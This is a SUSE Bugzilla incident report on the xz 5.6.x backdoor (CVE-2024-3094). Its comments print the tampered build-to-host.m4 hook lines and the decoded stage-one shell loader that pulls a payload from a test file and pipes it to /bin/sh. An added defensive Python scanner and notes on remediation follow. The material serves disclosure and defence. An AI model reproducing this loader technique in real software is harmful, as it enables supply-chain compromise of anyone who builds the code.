Bug 1222124 (CVE-2024-3094) - VUL-0: CVE-2024-3094: xz: backdoored 5.6.0,5.6.1 version
Summary: VUL-0: CVE-2024-3094: xz: backdoored 5.6.0,5.6.1 version
Status: NEW
Alias: CVE-2024-3094
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware: Other Other
Importance: P3 - Medium : Normal
Target Milestone: ---
Assignee: Security Team bot
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/399441/
Whiteboard:
Keywords:
Depends on: 1222448
Blocks:
Reported: 2024-03-28 11:46 UTC by Marcus Meissner
Modified: 2024-04-19 09:09 UTC (History)
CC List: 12 users

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Description Marcus Meissner 2024-03-28 11:46:09 UTC
The 5.6.1 version of xz is backdoored

m4/build-to-host.m4
calls 

  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`

and this:

    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
Comment 1 Marcus Meissner 2024-03-28 12:17:23 UTC
grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/
finds
tests/files/bad-3-corrupt_lzma2.xz
cat tests/files/bad-3-corrupt_lzma2.xz|tr "\t \-_" " \t_\-" >xx
xz -c -d <xx >yy


yy is:
####Hello####
#345U211267$^D330^W
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
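As an added example (not part of the bug report and not code from the xz project): a Python equivalent of the `grep -aErls "#{4}[[:alnum:]]{5}#{4}$"` probe from Comment 1. It walks an unpacked source tree byte-wise, the way `grep -a` does, and lists every file that contains a `####xxxxx####` marker line, so a packager can check a tarball for the known carrier layout before building it. The directory layout and file contents below are constructed for the demo; only the file name bad-3-corrupt_lzma2.xz is taken from the report.

```python
"""Report files in a source tree that carry the ####xxxxx#### marker line
that the tampered m4/build-to-host.m4 searches for.  Detection only: this
never decodes, executes or otherwise touches the matched file's content."""
import os
import re
import tempfile

# Same expression as the grep in Comment 1, applied to raw bytes (grep -a).
# [[:alnum:]] is approximated by ASCII letters and digits; MULTILINE makes
# `$` match at each newline, as grep's line-oriented `$` does.
MARKER_RE = re.compile(rb"#{4}[0-9A-Za-z]{5}#{4}$", re.MULTILINE)


def file_has_marker(path: str) -> bool:
    """True if any line of the file (read as bytes) ends in the marker."""
    with open(path, "rb") as fh:
        data = fh.read()
    return MARKER_RE.search(data) is not None


def find_marker_files(root: str) -> list:
    """Walk `root` and return the relative paths of all files matching the
    marker, sorted; unreadable files are skipped rather than aborting."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if file_has_marker(path):
                    hits.append(os.path.relpath(path, root))
            except OSError:
                continue
    return sorted(hits)


def build_demo_tree() -> str:
    """Constructed sample tree: one binary test file carrying the marker
    line in the middle of otherwise opaque bytes, one clean test file and
    one text file.  None of these are real xz test vectors."""
    root = tempfile.mkdtemp(prefix="xz-scan-")
    tests = os.path.join(root, "tests", "files")
    os.makedirs(tests)
    with open(os.path.join(tests, "bad-3-corrupt_lzma2.xz"), "wb") as fh:
        # xz magic, some junk, the marker on its own line, more junk
        fh.write(b"\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x02\x00!\x01\n"
                 b"####Hello####\n"
                 b"\x00\x11\xff\x03garbage\xff")
    with open(os.path.join(tests, "good-1-x86-lzma2.xz"), "wb") as fh:
        fh.write(b"\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x02\x00!\x01")
    with open(os.path.join(root, "README"), "w") as fh:
        fh.write("test files for xz\n#### not a marker ####\n")
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for hit in find_marker_files(demo):
        print("marker found in", hit)
```

Run it against the root of an unpacked tarball instead of the demo tree to check a release before building. A hit names a candidate carrier file to be compared against the upstream repository; an empty result only says that this particular marker layout is absent, so the m4/build-to-host.m4 shipped in the tarball should still be diffed against gnulib's copy, since that is where the report shows the `gl_am_configmake` hook being introduced.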
Comment 2 Marcus Meissner 2024-03-28 12:44:20 UTC
I informed distros list.

I reverted Base:System xz to 5.4.3 and submitted to Factory.
Comment 5 Marcus Meissner 2024-03-28 19:02:53 UTC
CRD: 2024-05-13 

in VINCE.

I doubt it will hold.
Comment 7 Dirk Mueller 2024-03-28 22:08:18 UTC
I can confirm that the described timing behavior difference is observable with the described method on openSUSE Tumbleweed from yesterday. I can confirm it's gone with today's snapshot.
Comment 8 Marcus Meissner 2024-04-02 11:14:03 UTC
Status update:

We reverted xz in Base:System and openSUSE:Factory on March 28th.

Factory got a fixed ftp tree done by the buildops and factory devs.

A full factory bootstrap was triggered from a base built without a compromised xz.

news.opensuse.org post was published. https://news.opensuse.org/2024/03/29/xz-backdoor/